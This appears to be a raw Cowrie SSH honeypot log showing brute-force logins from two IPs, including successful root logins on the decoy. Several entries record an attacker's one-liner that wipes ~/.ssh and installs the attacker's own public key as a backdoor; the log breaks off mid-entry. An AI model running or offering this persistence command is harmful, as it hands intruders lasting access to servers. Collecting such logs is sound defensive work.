{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:03:22.999979Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:03:23.263416Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:03:23.264252Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":55076,"dst_ip":"1.2.3.4","dst_port":22,"session":"186e260bfc21","protocol":"ssh","message":"New connection: 129.226.183.73:55076 (1.2.3.4:22) [session: 186e260bfc21]","sensor":"my-vps","timestamp":"2025-08-24T21:03:23.524944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:03:23.527704Z","src_ip":"129.226.183.73","session":"186e260bfc21"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:03:23.795233Z","src_ip":"129.226.183.73","session":"186e260bfc21"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:03:24.865318Z","src_ip":"129.226.183.73","session":"186e260bfc21"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:03:26.135537Z","src_ip":"129.226.183.73","session":"186e260bfc21"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":56154,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb48ee2bf76a","protocol":"ssh","message":"New connection: 129.226.183.73:56154 (1.2.3.4:22) [session: fb48ee2bf76a]","sensor":"my-vps","timestamp":"2025-08-24T21:03:26.418571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:03:26.425684Z","src_ip":"129.226.183.73","session":"fb48ee2bf76a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:03:26.702908Z","src_ip":"129.226.183.73","session":"fb48ee2bf76a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:03:27.813762Z","src_ip":"129.226.183.73","session":"fb48ee2bf76a"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:03:28.089511Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:03:28.093732Z","src_ip":"129.226.183.73","session":"fb48ee2bf76a"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":50920,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a4a9841e94c","protocol":"ssh","message":"New connection: 129.226.183.73:50920 (1.2.3.4:22) [session: 2a4a9841e94c]","sensor":"my-vps","timestamp":"2025-08-24T21:04:29.825789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:04:29.832075Z","src_ip":"129.226.183.73","session":"2a4a9841e94c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:04:30.104839Z","src_ip":"129.226.183.73","session":"2a4a9841e94c"}
{"eventid":"cowrie.login.failed","username":"hqadmin","password":"hqadmin","message":"login attempt [hqadmin/hqadmin] failed","sensor":"my-vps","timestamp":"2025-08-24T21:04:31.205632Z","src_ip":"129.226.183.73","session":"2a4a9841e94c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:04:32.489259Z","src_ip":"129.226.183.73","session":"2a4a9841e94c"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":37584,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf620efdb98a","protocol":"ssh","message":"New connection: 60.221.239.232:37584 (1.2.3.4:22) [session: cf620efdb98a]","sensor":"my-vps","timestamp":"2025-08-24T21:04:45.058745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:04:45.059668Z","src_ip":"60.221.239.232","session":"cf620efdb98a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:04:45.264769Z","src_ip":"60.221.239.232","session":"cf620efdb98a"}
{"eventid":"cowrie.login.failed","username":"tpuser","password":"123456","message":"login attempt [tpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T21:04:46.126359Z","src_ip":"60.221.239.232","session":"cf620efdb98a"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":48104,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7523b3fbb71","protocol":"ssh","message":"New connection: 129.226.183.73:48104 (1.2.3.4:22) [session: d7523b3fbb71]","sensor":"my-vps","timestamp":"2025-08-24T21:05:37.677426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:05:37.683602Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:05:37.935841Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.login.success","username":"root","password":"QWE123qwe","message":"login attempt [root/QWE123qwe] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:05:38.959918Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:05:39.526203Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:05:39.526917Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:05:39.528055Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:05:39.783525Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:05:40.340494Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:05:40.341146Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:05:40.599871Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:05:40.600684Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":49450,"dst_ip":"1.2.3.4","dst_port":22,"session":"9065cc04c234","protocol":"ssh","message":"New connection: 129.226.183.73:49450 (1.2.3.4:22) [session: 9065cc04c234]","sensor":"my-vps","timestamp":"2025-08-24T21:05:40.857552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:05:40.864780Z","src_ip":"129.226.183.73","session":"9065cc04c234"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:05:41.121210Z","src_ip":"129.226.183.73","session":"9065cc04c234"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:05:42.154071Z","src_ip":"129.226.183.73","session":"9065cc04c234"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:05:43.422416Z","src_ip":"129.226.183.73","session":"9065cc04c234"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":50682,"dst_ip":"1.2.3.4","dst_port":22,"session":"025a0e0afb60","protocol":"ssh","message":"New connection: 129.226.183.73:50682 (1.2.3.4:22) [session: 025a0e0afb60]","sensor":"my-vps","timestamp":"2025-08-24T21:05:43.672080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:05:43.679559Z","src_ip":"129.226.183.73","session":"025a0e0afb60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:05:43.930378Z","src_ip":"129.226.183.73","session":"025a0e0afb60"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:05:44.943760Z","src_ip":"129.226.183.73","session":"025a0e0afb60"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:05:45.204353Z","src_ip":"129.226.183.73","session":"d7523b3fbb71"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:05:45.205366Z","src_ip":"129.226.183.73","session":"025a0e0afb60"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:06:45.063557Z","src_ip":"60.221.239.232","session":"cf620efdb98a"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":45310,"dst_ip":"1.2.3.4","dst_port":22,"session":"04345f7bfd15","protocol":"ssh","message":"New connection: 129.226.183.73:45310 (1.2.3.4:22) [session: 04345f7bfd15]","sensor":"my-vps","timestamp":"2025-08-24T21:06:50.732728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:06:50.739779Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac